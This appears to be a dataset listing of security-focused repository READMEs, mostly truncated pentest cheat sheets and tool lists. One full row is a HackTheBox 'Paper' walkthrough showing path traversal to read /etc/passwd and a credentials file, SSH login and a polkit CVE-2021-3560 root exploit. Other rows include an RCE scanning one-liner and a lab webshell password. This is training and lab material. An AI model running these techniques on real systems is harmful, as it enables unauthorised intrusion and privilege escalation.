text
stringlengths
9
334k
<p align="center"> <img src="https://user-images.githubusercontent.com/25066959/67897219-5128a480-fb34-11e9-8cca-423a9dd6973f.png" width="256" title="Github Logo"> ![STARS](https://img.shields.io/github/stars/OlivierLaflamme/Cheatsheet-God?style=social) ![FORKS](https://img.shields.io/github/forks/OlivierLaflamme/C...
<p align="center"> <img src="https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/blob/master/CheatSheets/28533648.png" alt="Pentest Cheat Sheets" width="300" /> </p> <p align="center"> Pentest-Cheat-Sheets<br> @n3k00n3 | @UserXGnu | @alacerda </p> This repo has a collection of snippets of codes and commands to h...
# Swagger Code Generator [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https:/...
# Ultimate Resource List ## # https://gist.github.com/bgoonz/be5c5be77169ef333b431bc37d331176 ## ## - **[CLI Tools](#cli-tools-toc)** - **[GUI Tools](#gui-tools-toc)** - **[Web Tools](#web-tools-toc)** - **[Systems/Services](#systemsservices-toc)** - **[Networks](#networks-toc)** - **[Containers/Orchestration](#cont...
# fxy - Fox in the $hell fxy is a small and smart bash script for fast command generation of common hacking and CTF related tasks. The source is completely modularized and adding new commands is super easy. ``` . . |\__/| / \ | FXY || Fox in the $hell | /_,- -,_\ | github.com/doomguy/fxy | \@...
English | [简体中文](./README_CN.md) <p align="center"> <img src="./logo.png" width="300px"> </p> <p align="center"> <img src="https://img.shields.io/badge/version-2023.08-blue.svg" alt="202301"> <img src="http://img.shields.io/badge/license-CC--BY--NC--ND--4.0-blue.svg?style=flat" alt="license"> <img src="https:/...
## What's this repository about? This repository tries to explain what Prototype Pollution is and will try to give you a few examples on how to use it in certain use-cases. - [What is prototype pollution?](/prototype-pollution.md) - [Gunship (HackTheBox challenge) based on Prototype Pollution.](/gunship-walkthrough...
# #pwd: #/lifesfun101/Offensive_Security # #whoami I'm a young information security professional who enjoys tough problems to solve and new challenges to take on. I have graduated from college with Information Security Degree and have always been fascinated with this area of Information Technology. In the past I ha...
# Website scan **Summery:** - [Website scan](#website-scan) - [Nmap](#nmap) - [Scan for cms](#scan-for-cms) - [WebSite Scanning](#website-scanning) - [Dico list](#dico-list) - [Commands](#commands) - [Check for backup files](#check-for-backup-files) - [403 Bypasser](#403-bypasser) - ...
# 🔥Hacking-Wordpress 🔥 ![wordpress-hacking](https://user-images.githubusercontent.com/79256105/165776319-f7d73fb8-6bd9-4847-97da-461b641fbfe0.png) # Basic Wordpress and Wordpress Structure ### 🔥Wordpress Structure 🔥 WordPress can be installed on a Windows, Linux, or Mac OSX host. For this module, we will...
# SetupHelpDesk(Under Development) Index | Contents --- | --- ResetHAcker | [HAcker Daily Utility and OSINT](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/HackersUtilities.md) Crhuber | [Linix Cheetsheet ](https://github.com/crhuber/linux-cheatsheet) 0xblackbird - Developer Tools | [Developer Too...
# tips 顾名思义,收集国内外各大佬的奇淫技巧 1. [bugbountytips.me](http://bugbountytips.me/) >> github url: https://github.com/gwen001/bugbountytips 2. [mark-zh/BugBountyTips](https://github.com/mark-zh/BugBountyTips) 3. [KingOfBugbounty/KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips) 4. [dwisiswant0/awes...
# Wekor CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) Hey Everyone! This Box is just a little CTF I've prepared recently. I hope you enjoy it as it is my first time ever creating something like this ! This CTF is focused primarily on enumeration, better understandi...
ERROR: type should be string, got "https://app.hackthebox.com/machines/Paper\n\n```\n─[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\n└──╼ [★]$ nmap 10.129.72.199\nStarting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 04:47 BST\nNmap scan report for 10.129.72.199\nHost is up (0.26s latency).\nNot shown: 997 closed tcp ports (conn-refused)\nPORT STATE SERVICE\n22/tcp open ssh\n80/tcp open http\n443/tcp open https\n\n\n```\n\n```\n[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\n└──╼ [★]$ nikto -h 10.129.72.199\n- Nikto v2.1.6\n---------------------------------------------------------------------------\n+ Target IP: 10.129.72.199\n+ Target Hostname: 10.129.72.199\n+ Target Port: 80\n+ Start Time: 2022-06-13 04:54:30 (GMT1)\n---------------------------------------------------------------------------\n+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\n+ Uncommon header 'x-backend-server' found, with contents: office.paper\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\n+ Retrieved x-powered-by header: PHP/7.2.24\n+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE \n+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST\n\n```\n\nwhen you change the hostname to office.paper we see a new site pop up.\n\nwpscan result:\n```\n─[eu-dedivip-1]─[10.10.14.17]─[htb-bitmangler@pwnbox-base]─[~]\n└──╼ [★]$ wpscan --url http://office.paper\n_______________________________________________________________\n __ _______ _____\n \\ \\ / / __ \\ / ____|\n \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®\n \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\\n \\ /\\ / | | ____) | (__| (_| | | | |\n \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.17\n Sponsored by Automattic - https://automattic.com/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http://office.paper/ [10.129.72.199]\n[+] Started: Mon Jun 13 05:10:17 2022\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entries:\n | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9\n | - X-Powered-By: PHP/7.2.24\n | - X-Backend-Server: office.paper\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] WordPress readme found: http://office.paper/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).\n | Found By: Rss Generator (Passive Detection)\n | - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>\n | - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>\n\n[+] WordPress theme in use: construction-techup\n | Location: http://office.paper/wp-content/themes/construction-techup/\n | Last Updated: 2021-07-17T00:00:00.000Z\n | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt\n | [!] The version is out of date, the latest version is 1.4\n | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1\n | Style Name: Construction Techup\n | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...\n | Author: wptexture\n | Author URI: https://testerwp.com/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'\n\n[+] Enumerating All Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:07 <=> (137 / 137) 100.00% Time: 00:00:07\n\n[i] No Config Backups Found.\n\n[!] No WPScan API Token given, as a result vulnerability data has not been output.\n[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register\n\n[+] Finished: Mon Jun 13 05:10:38 2022\n[+] Requests Done: 169\n[+] Cached Requests: 5\n[+] Data Sent: 41.636 KB\n[+] Data Received: 167.972 KB\n[+] Memory used: 233.637 MB\n[+] Elapsed time: 00:00:20\n\n```\n\nuses insecure wordpress version\n\nWordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts\nDescription\nThis vulnerability could allow an unauthenticated user to view private or draft posts due to an issue within WP_Query.\nProof of Concept\nhttp://wordpress.local/?static=1&order=asc \n\nlooking at the chats:\n\nhttp://chat.office.paper/register/8qozr226AhkCHZdyY\n\nthe pwnbox machine stopped here.\n\nin rocket chat you can interact with the bot itself\n\n```\n kellylikescupcakes Hello. I am Recyclops. A bot assigned by Dwight. I will have my revenge on earthlings, but before that, I have to help my Cool friend Dwight to respond to the annoying questions asked by his co-workers, so that he may use his valuable time to... well, not interact with his co-workers.\nMost frequently asked questions include:\n- What time is it?\n- What new files are in your sales directory?\n- Why did the salesman crossed the road?\n- What's the content of file x in your sales directory? etc.\nPlease note that I am a beta version and I still have some bugs to be fixed.\nHow to use me ? :\n1. Small Talk:\nYou can ask me how dwight's weekend was, or did he watched the game last night etc.\neg: 'recyclops how was your weekend?' or 'recyclops did you watched the game last night?' or 'recyclops what kind of bear is the best?\n2. Joke:\nYou can ask me Why the salesman crossed the road.\neg: 'recyclops why did the salesman crossed the road?'\n<=====The following two features are for those boneheads, who still don't know how to use scp. I'm Looking at you Kevin.=====>\nFor security reasons, the access is limited to the Sales folder.\n3. Files:\neg: 'recyclops get me the file test.txt', or 'recyclops could you send me the file src/test.php' or just 'recyclops file test.txt'\n4. List:\nYou can ask me to list the files\n5. Time:\nYou can ask me to what the time is\neg: 'recyclops what time is it?' or just 'recyclops time'\n\n```\n\nso you can get directory listing\n\n```\n\n Fetching the directory listing of ../../../../../etc/passwd\n-rw-r--r--. 1 root root 2842 Jan 13 10:56 /home/dwight/sales/../../../../../etc/passwd\n<!=====Contents of file ../../../../../etc/passwd=====>\nroot❌0:0:root:/root:/bin/bash\nbin❌1:1:bin:/bin:/sbin/nologin\ndaemon❌2:2:daemon:/sbin:/sbin/nologin\nadm❌3:4:adm:/var/adm:/sbin/nologin\nlp❌4:7:lp:/var/spool/lpd:/sbin/nologin\nsync❌5:0:sync:/sbin:/bin/sync\nshutdown❌6:0:shutdown:/sbin:/sbin/shutdown\nhalt❌7:0:halt:/sbin:/sbin/halt\nmail❌8:12:mail:/var/spool/mail:/sbin/nologin\noperator❌11:0:operator:/root:/sbin/nologin\ngames❌12💯games:/usr/games:/sbin/nologin\nftp❌14:50:FTP User:/var/ftp:/sbin/nologin\nnobody❌65534:65534:Kernel Overflow User:/:/sbin/nologin\ndbus❌81:81:System message bus:/:/sbin/nologin\nsystemd-coredump❌999:997:systemd Core Dumper:/:/sbin/nologin\nsystemd-resolve❌193:193:systemd Resolver:/:/sbin/nologin\ntss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\npolkitd❌998:996:User for polkitd:/:/sbin/nologin\ngeoclue❌997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit❌172:172:RealtimeKit:/proc:/sbin/nologin\nqemu❌107:107:qemu user:/:/sbin/nologin\napache❌48:48:Apache:/usr/share/httpd:/sbin/nologin\ncockpit-ws❌996:993:User for cockpit-ws:/:/sbin/nologin\npulse❌171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin\nusbmuxd❌113:113:usbmuxd user:/:/sbin/nologin\nunbound❌995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin\nrpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\ngluster❌994:989:GlusterFS daemons:/run/gluster:/sbin/nologin\nchrony❌993:987::/var/lib/chrony:/sbin/nologin\nlibstoragemgmt❌992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin\nsaslauth❌991:76:Saslauthd user:/run/saslauthd:/sbin/nologin\ndnsmasq❌985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin\nradvd❌75:75:radvd user:/:/sbin/nologin\nclevis❌984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin\npegasus❌66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin\nsssd❌983:981:User for sssd:/:/sbin/nologin\ncolord❌982:980:User for colord:/var/lib/colord:/sbin/nologin\nrpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin\nsetroubleshoot❌981:979::/var/lib/setroubleshoot:/sbin/nologin\npipewire❌980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin\ngdm❌42:42::/var/lib/gdm:/sbin/nologin\ngnome-initial-setup❌979:977::/run/gnome-initial-setup/:/sbin/nologin\ninsights❌978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin\nsshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\navahi❌70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin\ntcpdump❌72:72::/:/sbin/nologin\nmysql❌27:27:MySQL Server:/var/lib/mysql:/sbin/nologin\nnginx❌977:975:Nginx web server:/var/lib/nginx:/sbin/nologin\nmongod❌976:974:mongod:/var/lib/mongo:/bin/false\nrocketchat❌1001:1001::/home/rocketchat:/bin/bash\ndwight❌1004:1004::/home/dwight:/bin/bash\n<!=====End of file ../../../../../etc/passwd=====>\n```\n\n```\n <!=====Contents of file ../hubot/.env=====>\nexport ROCKETCHAT_URL='http://127.0.0.1:48320'\nexport ROCKETCHAT_USER=recyclops\nexport ROCKETCHAT_PASSWORD=Queenofblad3s!23\nexport ROCKETCHAT_USESSL=false\nexport RESPOND_TO_DM=true\nexport RESPOND_TO_EDITED=true\nexport PORT=8000\nexport BIND_ADDRESS=127.0.0.1\n<!=====End of file ../hubot/.env=====>\n```\n\nssh into user using the id\n\n```\n[dwight@paper ~]$ ls\nbot_restart.sh hubot sales user.txt\n[dwight@paper ~]$ cat user.txt\n84c440ab09c9089e6873da2417576300\n[dwight@paper ~]$ \n```\n\nfor root\n```\n┌──(kali㉿kali)-[~]\n└─$ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh\n % Total % Received % Xferd Average Speed Time Time Time Current\n Dload Upload Total Spent Left Speed\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\n 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0\n100 758k 100 758k 0 0 136k 0 0:00:05 0:00:05 --:--:-- 172k\n\n```\n```\n┌──(kali㉿kali)-[~]\n└─$ scp linpeas.sh dwight@office.paper:linpeas.sh\nThe authenticity of host 'office.paper (10.129.128.121)' can't be established.\nECDSA key fingerprint is SHA256:2eiFA8VFQOZukubwDkd24z/kfLkdKlz4wkAa/lRN3Lg.\nAre you sure you want to continue connecting (yes/no/[fingerprint])? yes\nWarning: Permanently added 'office.paper' (ECDSA) to the list of known hosts.\ndwight@office.paper's password: \nPermission denied, please try again.\ndwight@office.paper's password: \nPermission denied, please try again.\ndwight@office.paper's password: \nlinpeas.sh \n\n```\n1583c9698e80c14d2fe148f9eef37289\n\nrunning linpeas to find vuln\n\n```\n[dwight@paper ~]$ python3 explot.py\n**************\nExploit: Privilege escalation with polkit - CVE-2021-3560\nExploit code written by Ahmad Almorabea @almorabea\nOriginal exploit author: Kevin Backhouse \nFor more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\n**************\n[+] Starting the Exploit \n[+] User Created with the name of ahmed\n[+] Timed out at: 0.006805316214353887\n[+] Timed out at: 0.00775959879493205\n[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root \n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\nbash: cannot set terminal process group (95164): Inappropriate ioctl for device\nbash: no job control in this shell\n[root@paper dwight]# whoami\nroot\n[root@paper dwight]# ls\nbot_restart.sh explot.py hubot linpeas.sh sales user.txt xp.sh\n[root@paper dwight]# cat /root/root.txt\n1583c9698e80c14d2fe148f9eef37289\n````\n\n\n\n\n\n\n\n\n\n"
# Red Teaming Toolkit This repository contains cutting-edge open-source security tools (OST) that will help you during adversary simulation and as information intended for threat hunter can make detection and prevention control easier. The list of tools below that could be potentially misused by threat actors such as ...
# WEB CHALLENGE: GRAMMAR ## Challenge Description When we access this page we get a Forbidden error. However we believe that something strange lies behind... Can you find a way in and retrieve the flag? ``` host: 88.198.233.174 port:37337 ``` <img src="forbidden.jpg" width=500px/> ### BURPSUITE Let's see what doe...
-1- 3 Ways Extract Password Hashes from NTDS.dit: https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit -2- 3 ways to Capture HTTP Password in Network PC: https://www.hackingarticles.in/3-ways-to-capture-http-password-in-network-pc/ -3- 3 Ways to Crack Wifi using Pyrit,oclHashcat and Cow...
**Web - The News Hacker - 150pts** Enoncé : ``` Only admin can see the flag :) ctf.sharif.edu:8082 Hint: Weak password! ``` **Résolution :** Le site est un wordpress : ![Alt](img/wordpress.png "Accueil") On commence par le scanner pour identifier les différentes versions des plugins et lister les utilisateurs. `...
# Awesome List Updates on Oct 12, 2017 11 awesome lists updated today. [🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c)...
# 80,443 - Pentesting Web Methodology If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or follow me on Twitter...
# TP Link TL-WR841N router cybersecurity analysis Cyber security analysis of TP Link TL-WR841N router. Github Pages version of this analysis can be found by [following this link](https://kostasereksonas.github.io/tp-link-tl-wr841n-security-analysis/) Table of Contents ================= * [TP Link TL-WR841N router cy...
--- description: >- TODO: Need to pull web notes out of the OS Agnostic section (and then rename that to something better!) --- # Web Notes {% hint style="success" %} Hack Responsibly. Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in...
# Awesome Go <a href="https://awesome-go.com/"><img align="right" src="https://github.com/avelino/awesome-go/raw/main/tmpl/assets/logo.png" alt="awesome-go" title="awesome-go" /></a> [![Build Status](https://github.com/avelino/awesome-go/actions/workflows/tests.yaml/badge.svg?branch=main)](https://github.com/avelino/...
# ICS Protocols Developed as a community asset ## General / Miscellaneous Releases - [ICS System Ports List](PORTS.md) - This is a list of common ICS tcp/udp ports. - [PoC 2013 SCADA Release](https://github.com/atimorin/PoC2013) - Power of Community 2013 conference special release of ICS/SCADA toolkit - [Industrial ...
# Swagger Code Generator - Master (2.3.0): [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Templat...
### IP `10.10.10.48` # Recon ### nmap `nmap -sC -sV 10.10.10.48 -oN init.nmap` ``` Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 21:38 EDT Nmap scan report for 10.10.10.48 Host is up (0.050s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (pr...
``` __ __ __ / /_ __ ______ / // / _ ___ __ / __ \/ / / / __ \/ // /_| |/_/ |/_/ / /_/ / /_/ / /_/ /__ __/> <_> < /_.___/\__, / .___/ /_/ /_/|_/_/|_| /____/_/ ``` 40X bypasser in Go. Methods from #bugbountytips, headers, verb tampering, use...
# HackTheBox WriteUps Auto-Fetcher Automated Script with [Github actions](https://github.com/apps/github-actions) to fetch official [HackTheBox](https://www.hackthebox.com/) write-ups after the box is **retired**. > **Warning** > Please create a private repo to store the write-ups using `Use this template` button. #...
Thanks to @ibra0963 for collecting the tips. https://twitter.com/Alra3ees/status/1419058927422017540 The easiest RCE i have found on zerocpter so far:- ``` httpx -l hosts.txt -path "/_fragment?_path=_controller=phpcredits&flag=-1" -threads 100 -random-agent -x GET -tech-detect -status-code -follow-redirects -titl...
# Lame URL: https://app.hackthebox.com/machines/Lame Level: Easy Date 29 May 2020 ## Walkthrough - [Enumeration](#enumeration) # Enumeration ## NMAP We found SAMBA service. We search in `msfconsole`: ``` msf5 exploit(unix/misc/distcc_exec) > search samba 3.0.20 Matching Modules ================ # Name ...
# awesome-mobile-security ![awesome](https://awesome.re/badge.svg) Maintained by [@vaib25vicky](https://twitter.com/vaib25vicky) with contributions from the security and developer communities. ## Android ### General - Blogs, Papers, How To's * [Android: Gaining access to arbitrary* Content Providers](https://blo...
<!-- markdownlint-disable MD033 MD041 --> <p align="center"> <a href="https://hub.docker.com/r/aaaguirrep/pentest"> <img alt="Docker for pentest" src="img/banner.jpg" width="600" /> </a> </p> <br/> <p align="center"> <a href="https://github.com/aaaguirrep/pentest"><img alt="GitHub code ...
## UPDATES: Highly recommend OffSec Proving Grounds for OSCP preparation! My best ranking in December 2021 is 16 / 2147 students. I share my writeups of 50+ old PG Practice machines (please send a request): https://drive.google.com/drive/folders/17KUupo8dF8lPJqUzjObIqQLup1h_py9t?usp=sharing ![best_ranking_offsec](htt...
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the...
[![Sn1perSecurity](https://sn1persecurity.com/images/Sn1perSecurity-Attack-Surface-Management-header2.png)](https://sn1persecurity.com) [![GitHub release](https://img.shields.io/github/release/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/releases) [![GitHub issues](https://img.shields.io/github/issues/1N3/Sn1per.svg...
--- title: 'WPScan' category: 'scanner' type: "CMS" state: "released" appVersion: "v3.8.22" usecase: "Wordpress Vulnerability Scanner" --- ![WPScan Logo](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png) <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier...
<h2 dir='rtl' align='right'>مجتمع InCyber</h2> <img align="right" width="300" height="300" src="https://user-images.githubusercontent.com/61029571/88852176-929acd00-d1f6-11ea-9fa3-b517dbc6d40c.png"> <h3 dir='rtl' align='right'>إخلاء المسؤولية</h3> > <p dir='rtl' align='right'>إن الأدوات والطرق المذكورة هنا هي للتعلّم ...
# OSCP OSCP cheatsheet by https://github.com/ibr2 # PWK-CheatSheet <pre> ██▓███ █ ███ ▄█▀ ▄████▄ ██░ ██▓█████▄▄▄ ▄▄▄█████▓ ██████ ██░ ██▓█████▓████▄▄▄█████▓ ▓██░ ██▓█░ █ ░███▄█▒ ▒██▀ ▀█ ▓██░ ██▓█ ▒████▄ ▓ ██▒ ▓▒ ▒██ ▒▓██░ ██▓█ ▀▓█ ▓ ██▒ ▓▒ ▓██░ ██▓▒█░ █ ░▓███▄░ ▒▓█ ▄▒██▀▀██▒...
# Recursos para aprender sobre seguridad informática Compilados por DCcurity (grupo de estudiantes del Departamento de Computación, Facultad de Ciencias Exactas y Naturales, Universidad de Buenos Aires). ## Caminos ### Reversing/Pwn - [Guía de escritra de exploits Fundación Sadosky](https://fundacion-sadosky.github...
[![Check out my new game hacking series over on the intigriti YT channel 💜](https://img.youtube.com/vi/ku6AtIY-Lu0/0.jpg)](https://www.youtube.com/watch?v=ku6AtIY-Lu0&list=PLmqenIp2RQcg0x2mDAyL2MC23DAGcCR9b "Game Hacking: Cheat Engine") ## Bug Bounty Programs ### Intigriti - [InnoGames](https://app.intigriti.com/prog...
# One-Liners [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re) ###### Thanks to all who create these Awesome One Liners❤️ ---------------------- ![image](https://user-images.githubusercontent.com/75373225/180003557-59bf909e-95e5-4b31-b4f8-fc05532f9f7c.png) --------------------------- # Subdomain Enu...
<!-- TOC --> - [Linux Releases](#linux-releases) - [Install](#install) - [Download](#download) - [Debian](#debian) - [Ubuntu](#ubuntu) - [Mirrors](#mirrors) - [Bash](#bash) - [tmux](#tmux) - [Init](#init) - [login & non-login shells](#login--non-login-shells) - [supervisord](#supervisord) - [Exit c...
# Awesome-Red-Team-Operation # PenTest and Red Teams Tools by Joas and S3cur3Th1sSh1t ## Powershell Scripts - https://github.com/S3cur3Th1sSh1t/WinPwn - https://github.com/dafthack/MailSniper - https://github.com/putterpanda/mimikittenz - https://github.com/dafthack/DomainPasswordSpray - https://github.com/mda...
# Custom Agent alert notifications Netdata Agent's alert notification feature allows you to send custom notifications to any endpoint you choose. > ### Note > > This file assumes you have read the [Introduction to Agent alert notifications](https://github.com/netdata/netdata/blob/master/health/notifications/README.md...
# Bug Bounty Notes - [x] [XSS Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/XSS) - [x] [CSRF Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/CSRF) - [x] [Open Redirect Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/Open%20Redirect) - [x] [Cache Poisoning Me...
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.5"> <img src="https://img.shiel...
wpscan ====== Docker image for [wpscan](http://wpscan.org/) Usage with my image: $ docker run --rm -it infoslack/dvwa --url www.example.com If you want to generate the image: $ git clone git@github.com:infoslack/sec-tools.git $ cd sec-tools/wpscan $ docker build -t wpscan . You can create a bash wrapper f...
### IP `10.10.10.152` # Recon ### nmap `nmap -sC -sV Netmon.nmap` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 02:53 EST Nmap scan report for 10.10.10.152 Host is up (0.049s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anon...
<h1 align="center">Resolvers <a href="https://twitter.com/intent/tweet?text=Trickest%20Resolvers%20-%20The%20most%20exhaustive%20list%20of%20reliable%20DNS%20resolvers%0A%0Ahttps%3A%2F%2Fgithub.com%2Ftrickest%2Fresolvers&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?l...
## 启动环境 ``` docker-compose build docker-compose up -d ``` ## 漏洞一: 在/app下存在菜刀木马,可通过D盾扫描获得 地址:http://127.0.0.1:8002/admin/trojan.php 密码:pass ## 漏洞二: 在http://127.0.0.1:8002/show.php?id=33存在sql注入漏洞,可以执行sqlmap -u "http://127.0.0.1:8002/show.php?id=33" ## 漏洞三: 在后台登录地址http://127.0.0.1:8002/admin/login.php 的用户名参数存在注入 ...
# SQL injection > A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. Attempting to manipulate SQL queries may have goals including: - Information Leakage - Disclosure of stored data - Manipulation of stored data - Bypassing authorisation c...
<h1 align="center"> <br> <img width="200" src="https://github.com/sindresorhus/awesome/raw/main/media/logo.svg" alt="awesome"> <br> </h1> # Awesome Hacking Resources ![Awesome Hacking](https://img.shields.io/badge/awesome-hacking-red.svg) ![Awesome community](https://img.shields.io/badge/awesome-community-gree...
# Awesome Bug Bounty Tools [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) > A curated list of various bug bounty tools ## Contents - [Recon](#Recon) - [Subdomain Enumeration](#Subdomain-Enumeration) - [Port Scanning](#Port-Scanning) - [Screenshots](#Screenshots) - [Technologies](#Tech...
# With `App` layout example ## How to use ### Using `create-next-app` Execute [`create-next-app`](https://github.com/zeit/next.js/tree/canary/packages/create-next-app) with [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/) or [npx](https://github.com/zkat/npx#readme) to bootstrap the example: ```bash npx create-...
# Pentest Tools ![](logo.png) The tools listed below are commonly used in penetration testing, and the tool catalog is referenced from Kali Tools, most of which are open source software. The project long-term supplementary update QAQ ## TODO * [x] Directory * [ ] Browser bookmarks * [ ] Tools Usage * [...
# Adding or changing email addresses If the operations of adding a new email address or changing an existing one do not require password confirmation, session hijacking, XSS or CSRF can lead to account takeover. # Amazon Cognito misusing {% embed url="https://0xn3va.gitbook.io/cheat-sheets/cloud/aws/amazon-cognito" ...
## Frequently Asked Questions (FAQ) ### What are the different issue states in Jira? | State | Description | | --- | --- | | `OPEN` | New submission | | `ACKNOWLEDGED` | Submission acknowledged by the bug bounty team | | `IN PROGRESS` | Submission was handed over to the responsible team | | `PENDING INTERNAL...
# My Security Resources - 來幫我按星星啦 Q__Q - https://github.com/stevenyu113228/My-Security-Resources --- [TOC] ## Scan ### Portscan - nmap - Static Binary - https://github.com/ernw/static-toolbox/releases - https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/nmap.exe ...
# Meta - HackTheBox - Writeup Linux, 30 Base Points, Medium ![info.JPG](images/info.JPG) ## Machine ![‏‏Meta.JPG](images/Meta.JPG) ## Meta is still an active machine - [Full writeup](Meta-Writeup.pdf) available with root hash password only. Telegram: [@evyatar9](https://t.me/evyatar9) Discord: [evyatar9#5800](ht...
# Flag Checker Web ## Challenge I made this [really cool flag checker](https://flag_checker.tjctf.org/)! The only way to get in is to guess the flag because I made it super secure... at least I hope I did. ## Solution After looking around the page, I realised there is a hidden `csrfmiddlewaretoken`. $ curl -s...
